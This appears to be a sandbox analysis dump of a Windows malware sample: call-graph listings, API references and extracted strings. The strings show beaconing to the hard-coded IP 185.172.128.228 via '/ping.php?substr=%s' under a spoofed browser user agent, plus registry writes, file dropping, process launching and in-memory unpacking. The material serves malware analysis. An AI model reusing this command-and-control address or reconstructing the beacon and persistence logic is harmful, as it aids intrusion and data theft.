39229->39233 39231 427451 __Strxfrm 39230->39231 39230->39248 39234 427464 htons connect 39231->39234 39232 4277e6 WSACleanup closesocket 39232->39233 39233->39072 39235 427493 39234->39235 39234->39248 39236 4274a5 send 39235->39236 39237 4274b5 39236->39237 39236->39248 39238 4274bb send 39237->39238 39243 4274d1 ___scrt_fastfail 39237->39243 39238->39243 39238->39248 39239 4274f7 recv 39239->39243 39239->39248 39240 427635 39241 42763c 39240->39241 39242 42777d 39240->39242 39261 427651 39240->39261 39241->39248 39241->39261 39245 42779d recv 39242->39245 39242->39248 39243->39239 39243->39240 39243->39248 39251 412faf 46 API calls 39243->39251 39771 411957 42 API calls 39243->39771 39244 427675 recv 39244->39248 39244->39261 39245->39242 39245->39248 39247->39223 39250 401aa1 27 API calls 39247->39250 39248->39232 39249 427770 39249->39248 39252 4273b4 39250->39252 39251->39243 39769 403ae1 27 API calls 39252->39769 39255 4273bf 39770 401ac2 27 API calls 39255->39770 39257 4273cc 39259 401aa1 27 API calls 39257->39259 39258 427712 recv 39258->39248 39258->39261 39259->39223 39261->39244 39261->39248 39261->39249 39261->39258 39262 42773d recv 39261->39262 39772 411957 42 API calls 39261->39772 39773 426148 22 API calls 39261->39773 39262->39248 39262->39261 39779 42780c 39263->39779 39265 426164 RegCreateKeyExA 39266 426222 39265->39266 39267 426197 39265->39267 39268 42529e 39266->39268 39269 426228 RegCloseKey 39266->39269 39270 402c71 27 API calls 39267->39270 39310 4019f8 26 API calls 39268->39310 39269->39268 39271 4261c0 39270->39271 39272 402c71 27 API calls 39271->39272 39273 4261e9 RegSetValueExA 39272->39273 39274 402bef 26 API calls 39273->39274 39275 42621a 39274->39275 39276 402bef 26 API calls 39275->39276 39276->39266 39278 403579 __EH_prolog 39277->39278 39279 401056 50 API calls 39278->39279 39280 40359c 39279->39280 39281 401056 50 API calls 39280->39281 39282 4035c8 39281->39282 39283 40399f 27 API calls 39282->39283 39284 4035d9 39283->39284 39284->39068 39780 410c7b 39285->39780 39288 426242 CreateFileA 39289 42590d 39288->39289 39290 426269 WriteFile FindCloseChangeNotification 39288->39290 39289->39088 39289->39091 39290->39289 39292 426521 39291->39292 39292->39292 39293 426529 ShellExecuteExA 39292->39293 39294 426575 39293->39294 39295 42655e WaitForSingleObject CloseHandle 39293->39295 39296 402bef 26 API calls 39294->39296 39295->39294 39297 42657d 39296->39297 39297->39091 39791 427830 39298->39791 39300 426297 CoInitialize CoCreateInstance 39301 4262ef MultiByteToWideChar SysAllocStringLen 39300->39301 39309 4262d1 __except_handler3 39300->39309 39303 426324 39301->39303 39303->39303 39304 42632b MultiByteToWideChar 39303->39304 39305 42633f 39304->39305 39305->39305 39306 426346 MultiByteToWideChar SysAllocStringLen 39305->39306 39307 426368 39306->39307 39307->39307 39308 42636f MultiByteToWideChar 39307->39308 39308->39309 39309->39104 39315 402c5a 39314->39315 39315->39315 39318 402c71 39315->39318 39317 401b3a 39317->39046 39319 402ca4 39318->39319 39321 402c80 BuildCatchObjectHelperInternal 39318->39321 39322 40373e 27 API calls 2 library calls 39319->39322 39321->39317 39322->39321 39323->39147 39325 402d2a 39324->39325 39326 402d31 __Strxfrm 39325->39326 39328 403859 39325->39328 39326->39152 39329 403866 39328->39329 39330 40386f 39328->39330 39335 4039ce 39329->39335 39332 40387b 39330->39332 39344 409256 39330->39344 39332->39326 39333 40386c 39333->39326 39336 409256 std::_Facet_Register 8 API calls 39335->39336 39337 4039e5 39336->39337 39338 4039f7 39337->39338 39339 4039ec 39337->39339 39351 41088a 26 API calls 4 library calls 39338->39351 39339->39333 39341 410924 39352 410932 11 API calls _abort 39341->39352 39343 410931 39346 40925b ___std_exception_copy 39344->39346 39345 409275 39345->39333 39346->39345 39348 409277 std::_Facet_Register 39346->39348 39353 412ede 7 API calls 2 library calls 39346->39353 39354 40abcb 39348->39354 39350 40996c 39351->39341 39352->39343 39353->39346 39356 40abeb KiUserExceptionDispatcher 39354->39356 39356->39350 39358 403e16 __EH_prolog 39357->39358 39389 407d73 39358->39389 39360 403e38 39399 404189 39360->39399 39366 403e7f 39437 4044e5 39366->39437 39369 403e8b 39458 4043fe 39369->39458 39372 4040a1 __EH_prolog 39371->39372 39373 4040b2 39372->39373 39528 40429b 27 API calls __EH_prolog 39372->39528 39373->39160 39373->39163 39373->39165 39375 4040d9 39529 404777 27 API calls 39375->39529 39377 4040e9 39380 404144 39377->39380 39383 404152 39377->39383 39530 404777 27 API calls 39377->39530 39531 404579 26 API calls 39377->39531 39532 404777 27 API calls 39380->39532 39533 404238 26 API calls _Deallocate 39383->39533 39385 402c03 39384->39385 39386 402bfa 39384->39386 39385->39170 39534 40387f 26 API calls 2 library calls 39386->39534 39388->39164 39390 407d7f __EH_prolog3 39389->39390 39462 407b1c 39390->39462 39395 407d9d 39476 407f02 40 API calls _Atexit 39395->39476 39396 407dfb std::locale::_Locimp::_Locimp_dtor 39396->39360 39398 407da5 _Yarn 39468 407b74 39398->39468 39400 404193 __EH_prolog 39399->39400 39401 407b1c std::_Lockit::_Lockit 2 API calls 39400->39401 39402 4041a2 39401->39402 39481 401318 39402->39481 39404 4041b9 std::locale::_Getfacet 39405 4041cc 39404->39405 39487 40436e 55 API calls 3 library calls 39404->39487 39406 407b74 std::_Lockit::~_Lockit 2 API calls 39405->39406 39408 403e49 39406->39408 39415 4033ea 39408->39415 39409 4041dc 39410 4041e3 39409->39410 39412 404219 39409->39412 39488 407d41 8 API calls std::_Facet_Register 39410->39488 39413 40abcb __CxxThrowException@8 KiUserExceptionDispatcher 39412->39413 39414 40422f 39413->39414 39416 4033f4 __EH_prolog 39415->39416 39417 407b1c std::_Lockit::_Lockit 2 API calls 39416->39417 39418 403403 39417->39418 39419 401318 int 4 API calls 39418->39419 39421 40341a std::locale::_Getfacet 39419->39421 39420 40342d 39422 407b74 std::_Lockit::~_Lockit 2 API calls 39420->39422 39421->39420 39489 401429 55 API calls 2 library calls 39421->39489 39424 40346a 39422->39424 39431 404424 39424->39431 39425 40343d 39426 403444 39425->39426 39427 40347a 39425->39427 39490 407d41 8 API calls std::_Facet_Register 39426->39490 39429 40abcb __CxxThrowException@8 KiUserExceptionDispatcher 39427->39429 39430 403490 39429->39430 39432 40442e __EH_prolog 39431->39432 39491 404d6b 39432->39491 39434 404463 39435 409256 std::_Facet_Register 8 API calls 39434->39435 39436 40447e 39435->39436 39436->39366 39438 4044ef __EH_prolog 39437->39438 39503 405177 8 API calls std::_Facet_Register 39438->39503 39440 40450d 39504 405025 29 API calls std::_Facet_Register 39440->39504 39442 404517 39443 404571 39442->39443 39444 40451e 39442->39444 39505 404efe 39443->39505 39508 405119 8 API calls std::_Facet_Register 39444->39508 39447 404528 39509 405e85 8 API calls std::_Facet_Register 39447->39509 39450 404531 39450->39369 39459 403eb8 39458->39459 39460 404406 39458->39460 39459->39156 39527 40387f 26 API calls 2 library calls 39460->39527 39463 407b32 39462->39463 39464 407b2b 39462->39464 39467 407b30 39463->39467 39478 408745 EnterCriticalSection 39463->39478 39477 411a5a EnterCriticalSection _abort 39464->39477 39467->39398 39475 407edf 8 API calls 2 library calls 39467->39475 39469 411a63 39468->39469 39470 407b7e 39468->39470 39480 411a43 LeaveCriticalSection 39469->39480 39472 407b91 39470->39472 39479 408753 LeaveCriticalSection 39470->39479 39472->39396 39473 411a6a 39473->39396 39475->39395 39476->39398 39477->39467 39478->39467 39479->39472 39480->39473 39482 401324 39481->39482 39483 401348 39481->39483 39484 407b1c std::_Lockit::_Lockit 2 API calls 39482->39484 39483->39404 39485 40132e 39484->39485 39486 407b74 std::_Lockit::~_Lockit 2 API calls 39485->39486 39486->39483 39487->39409 39488->39405 39489->39425 39490->39420 39494 404eb6 39491->39494 39495 404ed2 39494->39495 39496 404d85 39494->39496 39497 404ef8 39495->39497 39498 404eda 39495->39498 39496->39434 39502 4030f6 27 API calls 39497->39502 39499 403859 27 API calls 39498->39499 39499->39496 39503->39440 39504->39442 39510 408198 39505->39510 39507 404f09 39508->39447 39509->39450 39515 408040 39510->39515 39513 40abcb __CxxThrowException@8 KiUserExceptionDispatcher 39514 4081b7 39513->39514 39516 408054 std::regex_error::regex_error 39515->39516 39519 401088 39516->39519 39522 40a498 39519->39522 39521 4010b4 39521->39513 39523 40a4d2 39522->39523 39524 40a4a5 ___std_exception_copy 39522->39524 39523->39521 39524->39523 39526 4153ac 26 API calls 2 library calls 39524->39526 39526->39523 39527->39459 39528->39375 39529->39377 39530->39377 39531->39377 39532->39383 39534->39385 39536 401bbc __EH_prolog 39535->39536 39576 40307c 39536->39576 39542 401c1f 39543 401c51 39542->39543 39594 40187f 42 API calls 2 library calls 39542->39594 39545 402403 39543->39545 39546 40240d __EH_prolog 39545->39546 39612 402b06 39546->39612 39549 402441 39549->39179 39549->39180 39658 402baa 39551->39658 39553 401a30 ___scrt_fastfail 39553->39183 39555 4024ab __EH_prolog 39554->39555 39556 4024e4 39555->39556 39667 40187f 42 API calls 2 library calls 39555->39667 39558 402b06 42 API calls 39556->39558 39559 4024ee 39558->39559 39560 402551 39559->39560 39563 401d87 65 API calls 39559->39563 39564 40257c 39560->39564 39561 402511 39561->39560 39668 40187f 42 API calls 2 library calls 39561->39668 39563->39561 39565 402586 __EH_prolog 39564->39565 39566 402b06 42 API calls 39565->39566 39569 4025a8 39566->39569 39567 40265a 39575 402b87 26 API calls _Deallocate 39567->39575 39570 4025d8 39569->39570 39669 401f2b 39569->39669 39570->39567 39673 40187f 42 API calls 2 library calls 39570->39673 39711 4023b6 39572->39711 39574 401b95 39574->39187 39575->39190 39577 403086 __EH_prolog 39576->39577 39595 403175 39577->39595 39580 402fe5 39581 402fef __EH_prolog 39580->39581 39582 409256 std::_Facet_Register 8 API calls 39581->39582 39583 403005 39582->39583 39584 407d73 std::locale::_Init 43 API calls 39583->39584 39585 403013 39584->39585 39606 402e7b 39585->39606 39588 402f6b 39589 402f75 __EH_prolog 39588->39589 39590 402fbf std::ios_base::_Ios_base_dtor 39589->39590 39591 402e7b 26 API calls 39589->39591 39590->39542 39592 402f9d 39591->39592 39611 4035f5 55 API calls 7 library calls 39592->39611 39594->39543 39596 40317f __EH_prolog 39595->39596 39597 409256 std::_Facet_Register 8 API calls 39596->39597 39598 4031b9 39597->39598 39599 407d73 std::locale::_Init 43 API calls 39598->39599 39600 4031c6 39599->39600 39601 4033ea 55 API calls 39600->39601 39602 4031f5 std::ios_base::_Ios_base_dtor 39601->39602 39603 401bec 39602->39603 39605 40187f 42 API calls 2 library calls 39602->39605 39603->39580 39605->39603 39607 401c0f 39606->39607 39608 402ed9 39606->39608 39607->39588 39610 40e7d7 26 API calls 2 library calls 39608->39610 39610->39607 39611->39590 39613 402b10 __EH_prolog 39612->39613 39624 403101 39613->39624 39616 401d87 39617 401d99 39616->39617 39623 401df4 39617->39623 39632 402dfd 39617->39632 39621 401de1 39621->39623 39641 40fd67 39621->39641 39623->39549 39626 40310b __EH_prolog 39624->39626 39625 403128 39627 40241d 39625->39627 39631 40187f 42 API calls 2 library calls 39625->39631 39626->39625 39630 403242 42 API calls __EH_prolog 39626->39630 39627->39549 39627->39616 39630->39625 39631->39627 39633 401dc4 39632->39633 39634 402e0d 39632->39634 39633->39621 39633->39623 39638 4106d4 39633->39638 39634->39633 39652 4022ae 65 API calls 39634->39652 39636 402e1a 39636->39633 39653 40ea7d 65 API calls 2 library calls 39636->39653 39639 41049b _Xfiopen 64 API calls 39638->39639 39640 4106ea 39639->39640 39640->39621 39642 40fd72 39641->39642 39643 40fd87 39641->39643 39654 412381 20 API calls _abort 39642->39654 39644 40fd9f 39643->39644 39656 412381 20 API calls _abort 39643->39656 39644->39623 39647 40fd77 39655 410905 26 API calls _Deallocate 39647->39655 39648 40fd94 39657 410905 26 API calls _Deallocate 39648->39657 39651 40fd82 39651->39623 39652->39636 39653->39633 39654->39647 39655->39651 39656->39648 39657->39644 39659 402bc2 39658->39659 39660 402bc6 39658->39660 39659->39553 39661 402be9 39660->39661 39662 402bce 39660->39662 39666 4030f6 27 API calls 39661->39666 39664 403859 27 API calls 39662->39664 39664->39659 39667->39556 39668->39560 39670 401f3f 39669->39670 39671 401f52 __Strxfrm 39669->39671 39670->39570 39671->39670 39674 4102e9 39671->39674 39673->39567 39677 410306 39674->39677 39676 410301 39676->39670 39678 410312 CallCatchBlock 39677->39678 39679 410352 39678->39679 39680 410325 ___scrt_fastfail 39678->39680 39682 41034a __fread_nolock 39678->39682 39690 40e81d EnterCriticalSection 39679->39690 39704 412381 20 API calls _abort 39680->39704 39682->39676 39683 41035c 39691 41011d 39683->39691 39686 41033f 39705 410905 26 API calls _Deallocate 39686->39705 39690->39683 39695 41012f ___scrt_fastfail 39691->39695 39697 41014c 39691->39697 39692 41013c 39707 412381 20 API calls _abort 39692->39707 39694 410141 39708 410905 26 API calls _Deallocate 39694->39708 39695->39692 39695->39697 39700 41018f __fread_nolock 39695->39700 39706 410391 LeaveCriticalSection __fread_nolock 39697->39706 39698 4102ab ___scrt_fastfail 39710 412381 20 API calls _abort 39698->39710 39700->39697 39700->39698 39701 4154e8 _Xfiopen 26 API calls 39700->39701 39703 4192ad __fread_nolock 38 API calls 39700->39703 39709 410399 26 API calls 4 library calls 39700->39709 39701->39700 39703->39700 39704->39686 39705->39682 39706->39682 39707->39694 39708->39697 39709->39700 39710->39694 39712 4023dd 39711->39712 39713 4023ef 39712->39713 39715 402f2f 39712->39715 39713->39574 39716 402f39 39715->39716 39717 402f3d 39715->39717 39720 402e7b 26 API calls 39716->39720 39718 402dfd 65 API calls 39717->39718 39719 402f42 39718->39719 39721 40e228 _Xfiopen 67 API calls 39719->39721 39722 402f66 39720->39722 39721->39716 39722->39713 39724 40106d ___scrt_initialize_default_local_stdio_options 39723->39724 39731 40fd43 39724->39731 39728 4039c7 39727->39728 39729 4039bb 39727->39729 39728->39199 39730 402c71 27 API calls 39729->39730 39730->39728 39734 40ead5 39731->39734 39735 40eb15 39734->39735 39736 40eafd 39734->39736 39735->39736 39737 40eb1d 39735->39737 39758 412381 20 API calls _abort 39736->39758 39760 40e3f2 38 API calls 3 library calls 39737->39760 39739 40eb02 39759 410905 26 API calls _Deallocate 39739->39759 39742 40eb2d 39761 40eef9 20 API calls __dosmaperr 39742->39761 39745 40107b 39745->39195 39746 40eba5 39762 40f0ad 50 API calls 2 library calls 39746->39762 39749 40ebb0 39763 40ef2e 20 API calls _free 39749->39763 39750 40eb0d 39751 4097a5 39750->39751 39752 4097b0 IsProcessorFeaturePresent 39751->39752 39753 4097ae 39751->39753 39755 409efa 39752->39755 39753->39745 39764 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39755->39764 39757 409fdd 39757->39745 39758->39739 39759->39750 39760->39742 39761->39746 39762->39749 39763->39750 39764->39757 39766 401aab 39765->39766 39766->39766 39774 402cba 39766->39774 39768 401abd 39768->39205 39769->39255 39770->39257 39771->39243 39772->39261 39773->39261 39775 402cfa 39774->39775 39777 402cd0 BuildCatchObjectHelperInternal 39774->39777 39778 4037a9 27 API calls 2 library calls 39775->39778 39777->39768 39778->39777 39779->39265 39781 410c87 39780->39781 39782 410c9c 39780->39782 39788 412381 20 API calls _abort 39781->39788 39790 410965 51 API calls 4 library calls 39782->39790 39785 410c8c 39789 410905 26 API calls _Deallocate 39785->39789 39786 410c97 39786->39288 39788->39785 39789->39786 39790->39786 39791->39300 39793 4138da _abort 39792->39793 39794 4138e1 39793->39794 39795 4138f3 39793->39795 39828 413a28 GetModuleHandleW 39794->39828 39816 4119fb EnterCriticalSection 39795->39816 39798 4138e6 39798->39795 39829 413a6c GetModuleHandleExW 39798->39829 39799 413998 39817 4139d8 39799->39817 39803 41396f 39808 413987 39803->39808 39838 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39803->39838 39805 4138fa 39805->39799 39805->39803 39837 4151ba 20 API calls _abort 39805->39837 39806 4139e1 39840 424569 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39806->39840 39807 4139b5 39820 4139e7 39807->39820 39839 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39808->39839 39816->39805 39841 411a43 LeaveCriticalSection 39817->39841 39819 4139b1 39819->39806 39819->39807 39842 4177fa 39820->39842 39823 413a15 39826 413a6c _abort 8 API calls 39823->39826 39824 4139f5 GetPEB 39824->39823 39825 413a05 GetCurrentProcess TerminateProcess 39824->39825 39825->39823 39827 413a1d ExitProcess 39826->39827 39828->39798 39830 413a96 GetProcAddress 39829->39830 39831 413ab9 39829->39831 39832 413aab 39830->39832 39833 413ac8 39831->39833 39834 413abf FreeLibrary 39831->39834 39832->39831 39835 4097a5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39833->39835 39834->39833 39836 4138f2 39835->39836 39836->39795 39837->39803 39838->39808 39839->39799 39841->39819 39843 417815 39842->39843 39844 41781f 39842->39844 39846 4097a5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39843->39846 39849 4171b7 5 API calls 2 library calls 39844->39849 39847 4139f1 39846->39847 39847->39823 39847->39824 39848 417836 39848->39843 39849->39848 39850 2f675ee 39851 2f675fd 39850->39851 39854 2f67d8e 39851->39854 39855 2f67da9 39854->39855 39856 2f67db2 CreateToolhelp32Snapshot 39855->39856 39857 2f67dce Module32First 39855->39857 39856->39855 39856->39857 39858 2f67606 39857->39858 39859 2f67ddd 39857->39859 39861 2f67a4d 39859->39861 39862 2f67a78 39861->39862 39863 2f67a89 VirtualAlloc 39862->39863 39864 2f67ac1 39862->39864 39863->39864 39865 315003c 39866 3150049 39865->39866 39880 3150e0f SetErrorMode SetErrorMode 39866->39880 39871 3150265 39872 31502ce VirtualProtect 39871->39872 39873 315030b 39872->39873 39874 3150439 VirtualFree 39873->39874 39878 31505f4 LoadLibraryA 39874->39878 39879 31504be 39874->39879 39875 31504e3 LoadLibraryA 39875->39879 39877 31508c7 39878->39877 39879->39875 39879->39878 39881 3150223 39880->39881 39882 3150d90 39881->39882 39883 3150dad 39882->39883 39884 3150238 VirtualAlloc 39883->39884 39885 3150dbb GetPEB 39883->39885 39884->39871 39885->39884 39886 4264f9 SysFreeString SysFreeString CoUninitialize 39887 41870f 39888 41871b CallCatchBlock 39887->39888 39889 418727 39888->39889 39890 41873e 39888->39890 39921 412381 20 API calls _abort 39889->39921 39900 40e81d EnterCriticalSection 39890->39900 39893 41872c 39922 410905 26 API calls _Deallocate 39893->39922 39894 41874e 39901 41878b 39894->39901 39897 41875a 39923 418781 LeaveCriticalSection __fread_nolock 39897->39923 39899 418737 __fread_nolock 39900->39894 39902 4187b3 39901->39902 39903 418799 39901->39903 39905 4154e8 _Xfiopen 26 API calls 39902->39905 39927 412381 20 API calls _abort 39903->39927 39906 4187bc 39905->39906 39924 4197e5 39906->39924 39907 41879e 39928 410905 26 API calls _Deallocate 39907->39928 39910 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39910->39897 39912 4188c0 39914 4188cd 39912->39914 39915 418873 39912->39915 39913 418844 39913->39915 39917 418861 39913->39917 39930 412381 20 API calls _abort 39914->39930 39915->39910 39931 418920 30 API calls 2 library calls 39915->39931 39929 418aa4 31 API calls 3 library calls 39917->39929 39919 41886b 39919->39910 39921->39893 39922->39899 39923->39899 39932 419662 39924->39932 39926 4187d8 39926->39910 39926->39912 39926->39913 39927->39907 39928->39910 39929->39919 39930->39910 39931->39910 39933 41966e CallCatchBlock 39932->39933 39934 419676 39933->39934 39935 41968e 39933->39935 39958 41236e 20 API calls _abort 39934->39958 39937 419742 39935->39937 39942 4196c6 39935->39942 39963 41236e 20 API calls _abort 39937->39963 39938 41967b 39959 412381 20 API calls _abort 39938->39959 39941 419747 39964 412381 20 API calls _abort 39941->39964 39957 41e5cd EnterCriticalSection 39942->39957 39945 41974f 39965 410905 26 API calls _Deallocate 39945->39965 39946 4196cc 39948 4196f0 39946->39948 39949 419705 39946->39949 39960 412381 20 API calls _abort 39948->39960 39950 419767 __fread_nolock 28 API calls 39949->39950 39952 419700 39950->39952 39962 41973a LeaveCriticalSection __wsopen_s 39952->39962 39953 4196f5 39961 41236e 20 API calls _abort 39953->39961 39954 419683 __fread_nolock 39954->39926 39957->39946 39958->39938 39959->39954 39960->39953 39961->39952 39962->39954 39963->39941 39964->39945 39965->39954

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 42676c-4272ca call 42780c call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 473 4272d0-4272d3 0->473 474 4273e4-427405 call 401aa1 WSAStartup 0->474 473->474 476 4272d9-4273df call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 473->476 479 42740b-427421 socket 474->479 480 4277d9 474->480 476->474 483 427423-427433 call 40ff7e WSACleanup 479->483 484 427438-42744b call 401a67 gethostbyname 479->484 482 4277dc-4277e5 call 40ff7e 480->482 496 4277e6-4277ed WSACleanup closesocket 482->496 497 4277f3-42780b call 401ae8 483->497 484->482 494 427451-42748d call 40ac40 htons connect 484->494 494->482 504 427493-4274af call 403da5 call 401a67 send 494->504 496->497 504->482 514 4274b5-4274b9 504->514 516 4274d1-4274f5 call 40b740 514->516 517 4274bb-4274cb send 514->517 524 4274f7-42750b recv 516->524 517->482 517->516 524->482 526 427511-427516 524->526 528 42761e-427627 526->528 529 42751c-427524 526->529 528->482 531 42762d-427630 528->531 529->528 530 42752a-427532 529->530 530->528 534 427538-427543 530->534 531->524 536 427545-42755a call 412faf 534->536 537 427568-427571 534->537 536->482 545 427560-427563 536->545 540 427574-427579 537->540 540->540 543 42757b-42757d 540->543 546 427583-427598 call 403a0c 543->546 547 427635-42763a 543->547 549 427615-42761b 545->549 546->549 562 42759a-4275ba call 412faf 546->562 551 427647-42764b 547->551 552 42763c-427640 547->552 549->528 553 427651-42766d call 426152 551->553 554 42777d-42777f 551->554 552->553 557 427642 552->557 569 427670-427672 553->569 560 4277c3-4277d0 call 426152 554->560 561 427781-42779a call 426152 554->561 557->482 573 4277d2-4277d7 560->573 576 42779d-4277b0 recv 561->576 577 4275de-4275f6 call 412faf 562->577 578 4275bc-4275d6 call 411957 562->578 574 427675-427689 recv 569->574 573->496 574->482 581 42768f-427694 574->581 576->482 583 4277b2-4277bf 576->583 577->549 591 4275f8-427612 call 412faf 577->591 578->482 590 4275dc 578->590 586 427763-42776a 581->586 587 42769a-42769f 581->587 583->576 589 4277c1 583->589 586->574 592 427770 586->592 587->586 593 4276a5-4276aa 587->593 589->573 590->549 591->549 592->482 593->586 596 4276b0-4276d1 call 411957 593->596 596->482 604 4276d7-4276d9 596->604 604->482 606 4276df 604->606 608 427772-42777b 606->608 609 4276e5-4276f1 606->609 608->573 611 4276f3-42770a call 426148 609->611 612 42770d-42770f 609->612 611->612 613 427712-427728 recv 612->613 613->482 617 42772e-42773b 613->617 617->613 618 42773d-42774f recv 617->618 618->482 619 427755-42775e 618->619 619->569
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00426771
                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 004273FD
                                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00427413
                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 0042742D
                                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00427441
                                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00427473
                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00427484
                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
                                                                                                                                                                                                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
                                                                                                                                                                                                                              • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
                                                                                                                                                                                                                              • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000000,00000000), ref: 00427720
                                                                                                                                                                                                                              • recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
                                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
                                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 004277E6
                                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 004277ED
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                              • String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                              • API String ID: 791229064-1542616328
                                                                                                                                                                                                                              • Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                              • Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 620 424a0e-424b14 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 4265bc call 401b1e GetModuleFileNameA call 401b1e call 42604a call 401a0c 651 424da5-424da7 620->651 652 424b1a 620->652 663 4252b7-42588c call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 14 call 40197c call 403491 * 15 call 40197c call 403491 * 12 call 40197c call 403491 * 13 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 651->663 664 424dad-425299 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42615a 651->664 653 424b21-424b51 call 403491 * 3 652->653 654 424b56-424b86 call 403491 * 3 652->654 655 424d26-424d62 call 403491 * 4 652->655 656 424d64-424d8d call 403491 * 3 652->656 657 424c5a-424c8a call 403491 * 3 652->657 658 424b8b-424bd3 call 403491 * 5 652->658 659 424bd8-424c14 call 403491 * 4 652->659 660 424c19-424c55 call 403491 * 4 652->660 661 424c8f-424cd7 call 403491 * 5 652->661 662 424cdc-424d24 call 403491 * 5 652->662 737 424d94-424da0 call 40197c call 401adf 653->737 654->737 655->737 656->737 657->737 658->737 659->737 660->737 661->737 662->737 1166 425892-425910 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 663->1166 1167 425fc0-42601f call 4019f8 * 2 call 401ae8 call 401a11 call 401ae8 * 4 663->1167 1137 42529e-4252b2 call 4019f8 call 401ae8 664->1137 737->651 1137->663 1200 425912-425924 call 401b1e call 426510 1166->1200 1201 42592c-425b37 call 40ff7e call 403491 * 16 call 40197c call 403491 * 14 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1166->1201 1208 425929 1200->1208 1282 425d0d-425d12 1201->1282 1283 425b3d-425c53 call 40b740 call 403491 * 4 call 40197c call 426582 call 40b740 call 426582 call 403491 * 8 call 40197c call 40b740 1201->1283 1208->1201 1284 425fb4-425fbb call 4019f8 1282->1284 1285 425d18-425f01 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1282->1285 1363 425c55-425c5a 1283->1363 1284->1167 1420 425f07-425f82 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 1285->1420 1421 425fab-425faf call 4019f8 1285->1421 1363->1363 1365 425c5c-425c65 1363->1365 1366 425c66-425c6c 1365->1366 1366->1366 1368 425c6e-425c7c 1366->1368 1370 425c7e-425c83 1368->1370 1370->1370 1372 425c85-425c8e 1370->1372 1375 425c8f-425c95 1372->1375 1375->1375 1377 425c97-425cbe call 426242 1375->1377 1383 425d00-425d07 call 40ff7e 1377->1383 1384 425cc0-425ce4 CreateDirectoryA call 42628b 1377->1384 1388 